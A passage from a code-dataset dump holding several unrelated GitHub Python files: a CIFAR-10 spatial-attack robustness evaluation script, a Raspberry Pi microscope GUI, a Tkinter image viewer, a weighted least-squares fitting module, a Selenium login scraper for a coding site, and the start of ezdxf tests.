eval_adv_test_whitebox_spatial(model, device, test_loader):\n \"\"\"\n evaluate model by white-box attack\n \"\"\"\n model.eval()\n robust_err_total = 0\n natural_err_total = 0\n total = 0\n\n for data, target, unsup in test_loader:\n data, target = data.to(device), target.to(device)\n # pgd attack\n X, y = Variable(data, requires_grad=True), Variable(target)\n err_natural, err_robust = pgd_whitebox_spatial(model, X, y,\n max_rot=args.max_rot,\n max_trans=args.max_trans,\n eval=True)\n logging.info('err pgd (white-box): %g', err_robust.item())\n robust_err_total += err_robust\n natural_err_total += err_natural\n total += X.shape[0]\n natural_acc = 1.0 - (natural_err_total.item() / total)\n robust_acc = 1.0 - (robust_err_total.item() / total)\n logging.info(f'natural_accuracy: {natural_acc}')\n logging.info(f'robust_accuracy: {robust_acc}')\n stats = {'natural_accuracy': natural_acc, 'robust_accuracy': robust_acc}\n with open(os.path.join(output_dir, 'stats.json'), 'w') as outfile:\n json.dump(stats, outfile)\n\n\ndef main():\n # white-box attack\n logging.info('pgd white-box attack')\n checkpoint = torch.load(args.model_path)\n state_dict = checkpoint.get('state_dict', checkpoint)\n num_classes = checkpoint.get('num_classes', 10)\n normalize_input = checkpoint.get('normalize_input', False)\n model = get_model(args.model, num_classes=num_classes,\n normalize_input=normalize_input)\n if not all([k.startswith('module') for k in state_dict]):\n state_dict = {'module.' + k: v for k, v in state_dict.items()}\n if use_cuda:\n model = torch.nn.DataParallel(model).cuda()\n cudnn.benchmark = True\n model.load_state_dict(state_dict)\n\n eval_adv_test_whitebox_spatial(model, device, test_loader)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='PyTorch CIFAR Spatial Attack Evaluation')\n parser.add_argument('--dataset', type=str, default='cifar10',\n choices=DATASETS,\n help='The dataset')\n parser.add_argument('--test-batch-size', type=int, default=200, metavar='N',\n help='input batch size for testing (default: 200)')\n parser.add_argument('--no-cuda', action='store_true', default=False,\n help='disables CUDA training')\n parser.add_argument('--max-rot', default=30, type=int, help='rotation angle')\n parser.add_argument('--max-trans', default=0.1071, type=float, help='translation')\n parser.add_argument('--num-steps', default=20,\n help='perturb number of steps')\n parser.add_argument('--step-size', default=0.003, type=float,\n help='perturb step size')\n parser.add_argument('--model-path',\n default='./checkpoints/model_cifar_wrn.pt',\n help='model for white-box attack evaluation')\n parser.add_argument('--white-box-attack', default=True,\n help='whether perform white-box attack')\n parser.add_argument('--model', '-m', default='wrn-34-10', type=str,\n help='name of the model')\n parser.add_argument('--output-suffix', '-o', default='', type=str,\n help='string to add to log filename')\n\n args = parser.parse_args()\n\n output_dir, checkpoint_name = os.path.split(args.model_path)\n epoch = int(re.search('epoch(\\d+)', checkpoint_name).group(1))\n\n logging.basicConfig(\n level=logging.INFO,\n format=\"%(asctime)s | %(message)s\",\n handlers=[\n logging.FileHandler(os.path.join(output_dir,\n 'attack_epoch%d%s.log' %\n (epoch, args.output_suffix))),\n logging.StreamHandler()\n ])\n logger = logging.getLogger()\n\n logging.info('PGD attack')\n logging.info('Args: %s', args)\n\n # settings\n use_cuda = not args.no_cuda and torch.cuda.is_available()\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n kwargs = {'num_workers': 1, 'pin_memory': True} if use_cuda else {}\n\n # set up data loader\n transform_test = transforms.Compose([transforms.ToTensor(), ])\n # testset = torchvision.datasets.CIFAR10(root='data', train=False,\n # download=True,\n # transform=transform_test)\n testset = SemiSupervisedDataset(base_dataset=args.dataset,\n train=False, root='data',\n download=True,\n transform=transform_test)\n test_loader = torch.utils.data.DataLoader(testset,\n batch_size=args.test_batch_size,\n shuffle=False, **kwargs)\n\n main()\n\n", "repo_name": "p-lambda/robust_tradeoff", "sub_path": "cifar/code/spatial_attack_cifar10.py", "file_name": "spatial_attack_cifar10.py", "file_ext": "py", "file_size_in_byte": 8863, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.cuda.is_available", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 20, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 27, "usage_type": "call"}, {"api_name": "spatial.transform", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.linspace", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.linspace", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 43, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.clamp", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.unbind", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 68, "usage_type": "call"}, {"api_name": "spatial.unif", "line_number": 78, "usage_type": "call"}, {"api_name": "spatial.unif", "line_number": 79, "usage_type": "call"}, {"api_name": "spatial.unif", "line_number": 88, "usage_type": "call"}, {"api_name": "spatial.unif", "line_number": 89, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.unbind", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 98, "usage_type": "call"}, {"api_name": "torch.unbind", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 105, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 129, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 134, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 140, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 141, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 143, "usage_type": "call"}, {"api_name": "os.path", "line_number": 143, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 144, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 149, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 150, "usage_type": "call"}, {"api_name": "utils.get_model", "line_number": 154, "usage_type": "call"}, {"api_name": "torch.nn.DataParallel", "line_number": 159, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 159, "usage_type": "attribute"}, {"api_name": "torch.backends.cudnn.benchmark", "line_number": 160, "usage_type": "attribute"}, {"api_name": "torch.backends.cudnn", "line_number": 160, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 167, "usage_type": "call"}, {"api_name": "datasets.DATASETS", "line_number": 170, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 194, "usage_type": "call"}, {"api_name": "os.path", "line_number": 194, "usage_type": "attribute"}, {"api_name": "re.search", "line_number": 195, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 197, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 198, "usage_type": "attribute"}, {"api_name": "logging.FileHandler", "line_number": 201, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 201, "usage_type": "call"}, {"api_name": "os.path", "line_number": 201, "usage_type": "attribute"}, {"api_name": "logging.StreamHandler", "line_number": 204, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 206, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 208, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 209, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 212, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 212, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 213, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 217, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 217, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 217, "usage_type": "call"}, {"api_name": "datasets.SemiSupervisedDataset", "line_number": 221, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 225, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 225, "usage_type": "attribute"}]} +{"seq_id": "22307824379", "text": "from __future__ import print_function\nfrom PIL import Image, ImageTk\nimport tkinter as tki\nimport threading\nimport cv2\nimport os, time\nimport picamera\nimport picamera.array \n\nclass MicroscopeApp:\n def __init__(self, picam, pibgr):\n # store the video stream object and output path, then initialize\n # the most recently read frame, thread for reading frames, and\n # the thread stop event\n self.picam = picam\n self.frame = None\n self.thread = None\n self.stopEvent = None\n self.pibgr = pibgr\n\n # initialize the root window and image panel\n self.root = tki.Tk()\n self.panel = None\n \n # create a button, that when pressed, will take the current\n # frame and save it to file\n btn = tki.Button(self.root, text=\"Snapshot!\", command=self.takeSnapshot)\n btn.pack(side=\"bottom\", fill=\"both\", expand=\"yes\", padx=10, pady=10)\n \n # start a thread that constantly pools the video sensor for\n # the most recently read frame\n self.stopEvent = threading.Event()\n self.thread = threading.Thread(target=self.videoLoop, args=())\n self.thread.start()\n \n # set a callback to handle when the window is closed\n self.root.wm_title(\"Microscope imaging\")\n self.root.wm_protocol(\"WM_DELETE_WINDOW\", self.onClose)\n\n def videoLoop(self):\n while not self.stopEvent.is_set():\n # grab the frame from the video stream and resize it\n self.picam.capture(self.pibgr, \"bgr\", use_video_port = \"True\")\n self.frame = self.pibgr.array\n frame_small = cv2.resize(self.frame, (420,300))\n \n # clear buffer(if not it occurs incorrect error)\n self.pibgr.truncate(0)\n \n image = Image.fromarray(frame_small)\n image = ImageTk.PhotoImage(image)\n\n # if the panel is not None, we need to initialize it\n if self.panel is None:\n self.panel = tki.Label(image=image)\n self.panel.image = image\n self.panel.pack(side=\"left\", padx=10, pady=10)\n \n # otherwise, simply update the panel\n else:\n self.panel.configure(image=image)\n self.panel.image = image \n\n def takeSnapshot(self):\n timestr = time.strftime(\"%Y%m%d_%H%M%S\");\n filename = \"microscope_{}.tiff\".format(timestr)\n cv2.imwrite(filename, self.frame)\n print(\"[INFO] saved {}\".format(filename))\n\n def onClose(self):\n # set the stop event, cleanup the camera, and allow the rest of\n # the quit process to continue\n print(\"[INFO] closing...\")\n self.stopEvent.set() \n self.root.quit() \n\nif __name__ == '__main__':\n \n # initialize the video stream and allow the camera sensor to warmup\n print(\"[INFO] warming up camera...\")\n picam = picamera.PiCamera()\n time.sleep(0.5)\n picam.resolution = (1640,1232)\n time.sleep(2)\n pibgr = picamera.array.PiRGBArray(picam)\n time.sleep(0.5)\n\n # start the app\n pba = MicroscopeApp(picam,pibgr)\n pba.root.mainloop()", "repo_name": "OISL-Yonsei/raspberrypi-cam", "sub_path": "microscope.py", "file_name": "microscope.py", "file_ext": "py", "file_size_in_byte": 3165, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "tkinter.Tk", "line_number": 22, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 27, "usage_type": "call"}, {"api_name": "threading.Event", "line_number": 32, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 33, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 45, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 50, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 50, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 51, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 51, "usage_type": "name"}, {"api_name": "tkinter.Label", "line_number": 55, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 65, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 67, "usage_type": "call"}, {"api_name": "picamera.PiCamera", "line_number": 81, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 82, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 84, "usage_type": "call"}, {"api_name": "picamera.array.PiRGBArray", "line_number": 85, "usage_type": "call"}, {"api_name": "picamera.array", "line_number": 85, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 86, "usage_type": "call"}]} +{"seq_id": "35681261486", "text": "from tkinter import *\r\nfrom PIL import ImageTk, Image\r\n\r\nroot = Tk()\r\nimg1 = ImageTk.PhotoImage(Image.open(\"a.png\"))\r\nimg2 = ImageTk.PhotoImage(Image.open(\"b.png\"))\r\nimg3 = ImageTk.PhotoImage(Image.open(\"c.png\"))\r\nimg4 = ImageTk.PhotoImage(Image.open(\"d.png\"))\r\nimg5 = ImageTk.PhotoImage(Image.open(\"e.png\"))\r\nimg_list = [img1, img2, img3, img4, img5]\r\nimage_num = 0\r\ndef forward():\r\n global imageLabel, image_num, img_list\r\n image_num = image_num + 1\r\n print(f\"{image_num}\")\r\n if image_num == (len(img_list)):\r\n forward_btn = Button(root, text=\">>\", command=forward, state=DISABLED)\r\n forward_btn.grid(row=1, column=2)\r\n else:\r\n imageLabel.grid_forget()\r\n imageLabel = Label(root, image=img_list[image_num])\r\n forward_btn = Button(root, text=\">>\", command=forward)\r\n forward_btn.grid(row=1, column=2)\r\n imageLabel.grid(row=0, column=0, columnspan=3)\r\n\r\n\r\ndef back():\r\n global imageLabel, image_num, img_list\r\n if image_num<=0:\r\n back_btn = Button(root, text=\"<<\", command=back,state=DISABLED)\r\n back_btn.grid(row=1, column=0)\r\n else:\r\n imageLabel.grid_forget()\r\n image_num -= 1\r\n imageLabel = Label(root, image=img_list[image_num])\r\n forward_btn = Button(root, text=\">>\", command=forward)\r\n forward_btn.grid(row=1, column=2)\r\n imageLabel.grid(row=0, column=0, columnspan=3)\r\n\r\n\r\nimageLabel = Label(root, image=img_list[image_num])\r\nback_btn = Button(root, text=\"<<\", command=back)\r\nforward_btn = Button(root, text=\">>\", command=forward)\r\n\r\nimageLabel.grid(row=0, column=0, columnspan=3)\r\nback_btn.grid(row=1, column=0)\r\nforward_btn.grid(row=1, column=2)\r\nroot.mainloop()", "repo_name": "rayyan-24/Python-Resources", "sub_path": "Tkinter/7_image_viewer.py", "file_name": "7_image_viewer.py", "file_ext": "py", "file_size_in_byte": 1701, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PIL.ImageTk.PhotoImage", "line_number": 5, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 5, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 5, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 5, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 6, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 6, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 6, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 6, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 7, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 7, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 7, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 7, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 8, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 8, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 8, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 8, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 9, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 9, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 9, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 9, "usage_type": "name"}]} +{"seq_id": "33470390842", "text": "#!/bin/python3\n\nfrom CrownstoneYodiwo import CrownstoneNode\n\nfrom pathlib import Path\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--configFile', default='nodeConfig.json', help='configuration file')\nargs = parser.parse_args()\nconfigFile = args.configFile\n\ncFile = Path(configFile)\nif cFile.is_file():\n node = CrownstoneNode()\n node.loadConfig(configFile)\n node.start()\nelse:\n print(\"Error: File \" + configFile + \" does not exist\")\n", "repo_name": "crownstone/yodiwo-crownstone-node", "sub_path": "bin/yodiwo-crownstone.py", "file_name": "yodiwo-crownstone.py", "file_ext": "py", "file_size_in_byte": 488, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 8, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 13, "usage_type": "call"}, {"api_name": "CrownstoneYodiwo.CrownstoneNode", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "28385475811", "text": "# -*- coding: utf-8 -*-\n\"\"\"\n\nweighted2D.py\nContains functions to perform weighted least squares linear fit when there\nis error in both the x and y directions\n\nReference: B. Reed \"Linear least-squares fits with errors in both\ncoordinates. II: Comments on parameter variances\", Am. J. Phys, 60, 1992\n\n\"\"\"\n\ndef mfunc(m, x_in, y_in):\n # MFUNC - function to be minimized in order to find best slope\n\n import numpy as np\n\n # Separate x and y from their weights\n x = x_in[:,0]\n y = y_in[:,0]\n Wxi = x_in[:,1]\n Wyi = y_in[:,1]\n\n # Calculate weight for each data point\n Wi = Wxi*Wyi/(m**2*Wyi+Wxi) # Eq 8\n\n # Weighted means and deviations from weighted means\n xbar = np.sum(Wi*x)/np.sum(Wi) # Eq 11\n ybar = np.sum(Wi*y)/np.sum(Wi) # Eq 12\n U = x-xbar # Eq 9\n V = y-ybar # Eq 10\n\n # Minimization function (eq 19 from paper)\n g = (m**2*np.sum((Wi**2)*U*V/Wxi) + m*np.sum((Wi**2)*((U**2)/Wyi - \n (V**2)/Wxi)) - np.sum((Wi**2)*U*V/Wyi)) \n g = g**2\n\n return g\n \n\ndef wls2d(x, y, delx, dely):\n \"\"\" \n WLS2D Calculates the weighted least squares fit to a straight line when\n there are errors in both the x and y directions.\n\n Reference: B. Reed \"Linear least-squares fits with errors in both\n coordinates. II: Comments on parameter variances\", Am. J. Phys, 60, 1992\n\n fitparams = wls2d(x, y, delx, dely, flag);\n\n INPUTS\n x vector of independent data points\n y vector of dependent data points\n delx vector of uncertainties/errors in x points\n dely vector of uncertainties/errors in y points\n\n OUTPUT\n fitparams vector of fit parameters\n fitparams[0] best fit slope\n fitparams[1] best fit y intercept\n fitparams[2] uncertainty in slope\n fitparams[3] uncertainty in y-intercept\n\n Note: equation numbers from B. Reed's paper\n \"\"\"\n\n import numpy as np\n from numpy.matlib import repmat\n from scipy.optimize import fmin\n\n N = len(x)\n\n # Calculate weights and weighted means\n Wxi = 1/(delx**2)\n Wyi = 1/(dely**2)\n \n # Force vectors to be column vectors \n x.shape = (N,1)\n y.shape = (N,1)\n Wxi.shape = (N,1)\n Wyi.shape = (N,1)\n\n # Add weights as second columns to x and y\n xWxi = np.append(x, Wxi, axis=1)\n yWyi = np.append(y, Wyi, axis=1)\n\n # Use unweighted linear regression to find a slope initial guess\n m0 = ((N*np.sum(x*y) - np.sum(x)*np.sum(y))/(N*np.sum(x**2) - np.sum(x)**2))\n\n # Find best slope\n m = fmin(func=mfunc, x0=m0, args=(xWxi, yWyi,))\n\n\n # Calculate final weight for each data point\n Wi = Wxi*Wyi/(m**2*Wyi+Wxi) # Eq 8\n Wj = Wi\n\n # Weighted means & deviations from weighted means\n xbar = np.sum(Wi*x)/np.sum(Wi) # Eq 11\n ybar = np.sum(Wi*y)/np.sum(Wi) # Eq 12\n U = x-xbar # Eq 9\n V = y-ybar # Eq 10\n\n # Calculate corresponding y-intercept (equation 13)\n c = ybar - m*xbar # Eq 13\n\n # Sum of weighted residuals\n S = np.sum(Wi*((V-m*U)**2)) # Eq 14\n\n # Use calculated data points\n lam = Wi*(c + m*x - y) # Eq 26\n x = x - lam*m/Wxi # Eq 24\n y = y + lam/Wyi # Eq 25\n xbar = np.sum(Wi*x)/np.sum(Wi) # Eq 11\n ybar = np.sum(Wi*y)/np.sum(Wi) # Eq 12 \n U = x-xbar # Eq 9\n V = y-ybar # Eq 10\n\n\n # Calculate parameter derivatives (Appendix)\n W = np.sum(Wi) # Eq A10\n HH = -2*m/W*np.sum(Wi**2*V/Wxi) # Eq A11\n JJ = -2*m/W*np.sum(Wi**2*U/Wxi) # Eq A12\n AA = 4*m*np.sum(Wi**3*U*V/Wxi**2) - W*HH*JJ/m # Eq A3\n BB = -np.sum(Wi**2*(4*m*Wi/Wxi*(U**2/Wyi - V**2/Wxi) - 2*V*HH/Wxi + \n 2*U*JJ/Wyi)) # Eq A4\n CC = -np.sum(Wi**2/Wyi*(4*m*Wi*U*V/Wxi + V*JJ + U*HH)) # Eq A5\n delta = np.eye(N) # Kroneker Delta\n delmat = delta - repmat(Wj,1,N)/W\n DD = np.dot(delmat,(Wi**2*V/Wxi)) # Eq A6\n EE = 2*np.dot(delmat,(Wi**2*U/Wyi)) # Eq A7\n FF = np.dot(delmat,(Wi**2*V/Wyi)) # Eq A8\n GG = np.dot(delmat,(Wi**2*U/Wxi)) # Eq A9\n A = np.sum(Wi**2*U*V/Wxi) # Eq 19 & 20\n B = np.sum(Wi**2*(U**2/Wyi - V**2/Wxi)) # Eq 19 & 20\n dmdxj = -1*(m**2*DD + m*EE - FF)/(2*m*A + B - AA*m**2 + BB*m - CC) # Eq A1\n dmdyj = -1*(m**2*GG - 2*m*DD - 0.5*EE)/(2*m*A + B - AA*m**2 + BB*m - \n CC); # Eq A2 \n dcdxj = (HH - m*JJ - xbar)*dmdxj - m*Wj/W # Eq A13\n dcdyj = (HH - m*JJ - xbar)*dmdyj + Wj/W # Eq A14\n delm = np.sqrt(S/(N-2)*np.sum(1/Wyi*dmdyj**2 + 1/Wxi*dmdxj**2)) # Eq 21\n delc = np.sqrt(S/(N-2)*np.sum(1/Wyi*dcdyj**2 + 1/Wxi*dcdxj**2)) # Eq 21\n\n fitparams = np.concatenate((m, c))\n fitparams = np.append(fitparams, delm)\n fitparams = np.append(fitparams, delc)\n\n return fitparams\n\n", "repo_name": "tzsummerscales/linfit2Derrors", "sub_path": "weighted2D.py", "file_name": "weighted2D.py", "file_ext": "py", "file_size_in_byte": 4465, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.sum", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 88, "usage_type": "call"}, {"api_name": "scipy.optimize.fmin", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 108, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.matlib.repmat", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 142, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 142, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 146, "usage_type": "call"}]} +{"seq_id": "31175258628", "text": "from selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\nfrom webdriver_manager.chrome import ChromeDriverManager\nimport time\n\ndef progarmmers(id,pw):\n try:\n noopen = webdriver.ChromeOptions()\n noopen.add_argument(\"headless\")\n driver = webdriver.Chrome(ChromeDriverManager().install(),options=noopen)\n \n url = 'https://programmers.co.kr/account/sign_in?referer=https://school.programmers.co.kr/learn/challenges?order=recent&page=1'\n driver.get(url)\n # driver.maximize_window() # 화면을 열고 풀스크린으로 적용\n id_box = driver.find_element(by=By.XPATH,value='//*[@id=\"main-app-account\"]/div/div[2]/div/div[2]/div[1]/div/div[2]/div[2]/input')\n id_box.click()\n id_box.send_keys(id)\n\n pw_box = driver.find_element(by=By.XPATH,value='//*[@id=\"main-app-account\"]/div/div[2]/div/div[2]/div[1]/div/div[2]/div[4]/input')\n pw_box.click()\n pw_box.send_keys(pw)\n\n login_box = driver.find_element(by=By.CSS_SELECTOR,value='#main-app-account > div > div.CqFgmmYa7JLTXOn9RZNl > div > div._i_cm82hE96w0g1ww1rO > div.by9dgl6a9xm729a_4ynt > div > div.G7QZ1shWGosDZ1csHsNt > button')\n login_box.click()\n time.sleep(1)\n\n score = driver.find_element(by=By.XPATH, value='//*[@id=\"edu-service-app-main\"]/div/div[2]/article/div[2]/aside/div[1]/div/ul/li[2]/div[2]')\n return score.text\n except:\n return '아이디/비밀번호가 잘못되었습니다.'", "repo_name": "JunHeeMerong/JunBlog", "sub_path": "main/programmers.py", "file_name": "programmers.py", "file_ext": "py", "file_size_in_byte": 1548, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "selenium.webdriver.ChromeOptions", "line_number": 9, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 9, "usage_type": "name"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 11, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 11, "usage_type": "name"}, {"api_name": "webdriver_manager.chrome.ChromeDriverManager", "line_number": 11, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 16, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 16, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 20, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 20, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 24, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 24, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 26, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 28, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 28, "usage_type": "name"}]} +{"seq_id": "70791181288", "text": "from typing import cast, Union\n\nimport pytest\nimport ezdxf\nimport math\n\nfrom ezdxf.entities import Ellipse, Point, Arc\nfrom ezdxf.explode import angle_to_param\nfrom ezdxf.math import normalize_angle, Vector\n\n\n@pytest.fixture(scope='module')\ndef doc():\n d = ezdxf.new()\n blk = d.blocks.new('Test1')\n blk.add_line((0, 0), (1, 0))\n blk.add_line((0, 0), (0, 1))\n msp = d.modelspace()\n msp.add_blockref('Test1', (10, 10))\n msp.add_blockref('Test1', (20, 10), dxfattribs={'xscale': 2}) # yscale and zscale\n return d\n\n\n@pytest.fixture(scope='module')\ndef msp(doc):\n return doc.modelspace()\n\n\n@pytest.fixture(scope='module')\ndef entitydb(doc):\n return doc.entitydb\n\n\ndef test_01_virtual_entities(msp):\n blockrefs = msp.query('INSERT')\n blockref = blockrefs[0]\n\n virtual_entities = list(blockref.virtual_entities())\n assert len(virtual_entities) == 2\n\n e = virtual_entities[0]\n # Virtual entities should not be stored in the entity database.\n assert e.dxf.handle is None, 'handle should be None'\n # Virtual entities should not reside in a layout.\n assert e.dxf.owner is None, 'owner should be None'\n # Virtual entities should be assigned to the same document as the block reference.\n assert e.doc is blockref.doc\n\n assert e.dxftype() == 'LINE'\n assert e.dxf.start == blockref.dxf.insert\n assert e.dxf.end == blockref.dxf.insert + (1, 0)\n\n e = virtual_entities[1]\n assert e.dxftype() == 'LINE'\n assert e.dxf.start == blockref.dxf.insert\n assert e.dxf.end == blockref.dxf.insert + (0, 1)\n\n blockref = blockrefs[1]\n virtual_entities = list(blockref.virtual_entities(non_uniform_scaling=False))\n assert len(virtual_entities) == 0\n virtual_entities = list(blockref.virtual_entities(non_uniform_scaling=True))\n assert len(virtual_entities) == 2\n\n e = virtual_entities[0]\n assert e.dxftype() == 'LINE'\n assert e.dxf.start == blockref.dxf.insert\n assert e.dxf.end == blockref.dxf.insert + (2, 0), 'should apply xscale 2'\n\n e = virtual_entities[1]\n assert e.dxftype() == 'LINE'\n assert e.dxf.start == blockref.dxf.insert\n assert e.dxf.end == blockref.dxf.insert + (0, 1), 'should apply yscale 1'\n\n\ndef test_02_explode_blockrefs(doc, msp, entitydb):\n blockrefs = msp.query('INSERT')\n blockref = blockrefs.first\n blockref_owner = blockref.dxf.owner\n blockref_insert = blockref.dxf.insert\n\n assert len(msp) == 2 # 2 INSERT\n exploded_entities = blockref.explode()\n assert blockref.is_alive is False, 'Exploded block reference should be destroyed.'\n assert 